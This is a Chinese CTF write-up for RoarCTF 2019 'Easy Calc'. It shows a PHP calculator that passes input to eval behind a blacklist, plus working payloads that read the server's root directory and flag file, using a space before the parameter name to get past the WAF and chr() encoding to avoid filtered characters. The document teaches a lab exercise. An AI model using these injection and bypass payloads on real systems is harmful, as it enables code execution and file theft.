[RoarCTF 2019]Easy Calc1

题目

查看页面源代码

<script>
    $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;
    })
</script>

查看calc.php文件

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

源码有过滤，这里的话num只能输入数字，字母无法输入

scandir()

列出 参数目录 中的文件和目录，要不然我们怎么知道flag在哪。

/calc.php? num=2;var_dump(scandir(chr(47)))

var_dump()用来打印
scandir（）用来获取目录文件
chr（47）是/的ASCII编码，因为/被过滤了，用这个什么都不显示。
搞不懂它为什么会被过滤，被什么过滤。
再就是num前有个空格，用来绕过waf（web防火墙）（为什么是waf？）。
这是php的机制，在传进php代码的url时，一些字符会被忽略或变成_。
因为php一般是这样$_GET['num']获取url传进来的参数,当有一些奇怪的字符和参数写在一些时，如%[num%id,它会变成$_GET['num_id']。所以在num前加个空格可以绕过waf并且php会把它当成正常的num使用，此时并不是’ num’而是‘num’

payload

/calc.php?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

拿下flag

flag{01d73ddd-84aa-4035-b152-47cc33ee159b}